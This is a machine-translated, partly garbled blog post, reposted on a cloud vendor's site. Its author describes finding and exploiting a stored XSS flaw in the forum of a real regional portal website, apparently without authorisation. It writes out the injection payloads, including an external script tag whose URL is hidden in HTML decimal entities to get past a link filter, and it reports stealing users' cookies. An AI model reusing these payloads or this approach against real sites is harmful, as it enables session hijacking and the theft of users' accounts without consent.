Home > Cloud Computing > Cloud Security

Linglong network storage XSS

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Author: black bird
Today, I was bored and went online for a stroll. I suddenly remembered that my girlfriend once said that Linglong had opened a large network and suddenly wanted to check the security. Baidu looked for it:
Liuzhou's largest and most popular comprehensive portal network .. If you write it like this, let us know what it means to be a portal, and decide to learn a lesson.
 
I have been paying attention to the content of XSS recently. I decided to check whether the XSS vulnerability exists.
 
Go to the Forum to register a user and see where an image is uploaded over the network:
Try: http: // "> <script> alert ('A') </script.> result: it does not matter. Continue to find a picture of the network. OK, release successful
Hey, view Elements
If the Img tag and src attributes are not properly filtered, XSS is easy to appear. We try to capture the package. "> the source code is missing. Try again "> <script> alert ('A') </script.>

I don't know why the title turns into garbled characters .... Try calling js externally
<P> <a href = http://up.2cto.com/2013/0106/20130106112109502.png "target =" _ blank "> <script src =" http://www.gxmhw.net/anying/test.js "> </script> png" width = "10" height = "10"> </a> </p>
Suddenly found...
It's okay. It cannot stop us from moving forward. I think it may be to prohibit external links. Let's change the statement: <p> <a href = "http: // www.2cto.com/static/image/ss/logo.png" target = "_ blank"> <script src =" & #104; & #116; & #116; & #112; & #58; & #47; & #47; & #119; & #119; & #119; & #46; & #103; & #120; & #109; & #104; & #119; & #46; & #110; & #101; & #116; & #47; & #97; & #110; & #121; & #105; & #110; & #103; & #47; & #116; & #101; & #115; & #116; & #46; & #106; & #115; "> </script> png" <script = ""> </a> </p>
People should be able to see it carefully.
"> <Script src =" & #104; & #116; & #116; & #112; & #58; & #47; & #47; & #119; & #119; & #119; & #46; & #103; & #120; & #109; & #104; & #119; & #46; & #110; & #101; & #116; & #47; & #97; & #110; & #121; & #105; & #110; & #103; & #47; & #116; & #101; & #115; & #116; & #46; & #106; & #115; "> </script> png"
We perform segments and then encrypt the external links in a 10-digit format. Successfully inserted into the diary
Hey, let's see if we have obtained the cookie value:

Obtained successfully

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More